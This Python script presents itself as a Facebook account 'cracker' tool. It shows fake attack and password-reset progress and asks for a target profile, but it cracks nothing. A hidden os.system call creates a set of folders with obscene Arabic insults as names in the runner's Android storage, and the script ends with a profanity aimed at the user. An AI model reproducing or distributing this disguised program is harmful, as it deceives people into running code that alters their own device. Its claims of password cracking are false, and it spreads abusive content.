import time
import os
import pyfiglet
from colorama import Fore,Back

os.system('clear')
result = pyfiglet.figlet_format("SmarT Fb")
a7a = pyfiglet.figlet_format("Cracker")
print(result)
print(a7a)
print(pyfiglet.figlet_format("By Joe",justify="center"))
print(Back.RED + Fore.BLUE + "Welcome Hack Fb Tool")
print()
print(Back.GREEN + Fore.RED + "Let's start: ")
print(".")
time.sleep(2)
print("..")
time.sleep(2)
print("...")
time.sleep(4)
print(Back.BLACK)
os.system('clear')
name = input(Fore.GREEN + Back.RED + "Enter Link of Profile or username : ")
print()
print(Back.GREEN + Fore.RED + "Attacking "+name+" please Dont Turn off the tool while Attacking..")
time.sleep(2)
print(".")
time.sleep(2)
print("..")
time.sleep(2)
print("...")
time.sleep(2)
print("Progress..")
time.sleep(4)
os.system('cd /storage/emulated/0;mkdir "كسمك";mkdir "كسمك يا شرموط";mkdir "كسمك يا متنااااااك";mkdir "يابن العاهره يا خول";mkdir "يلعن كسمك";mkdir "هنيك امك";mkdir "كسسسسسمككككك";mkdir "هقلب لامك بهجت صابر يا خول يا عرص"')
time.sleep(0.00000000000000001)
print(Back.BLACK)
os.system('clear')
print()
print(Back.GREEN + Fore.RED +"trying to crack bin and reset victims Password This Might Take a While.")
time.sleep(30)
print()
gg = input("Done With reseting password Type new Password: ")
time.sleep(2)
print()
print("Resseting Password to "+gg+ "..")
time.sleep(5)
print(Back.BLACK)
os.system('clear')
print(Fore.RED + "Done.")
print()
print()
print("go to this location /storage/emulated/0")
time.sleep(0.000003)
print()
print()
print("if you on pc Go fuck yourself")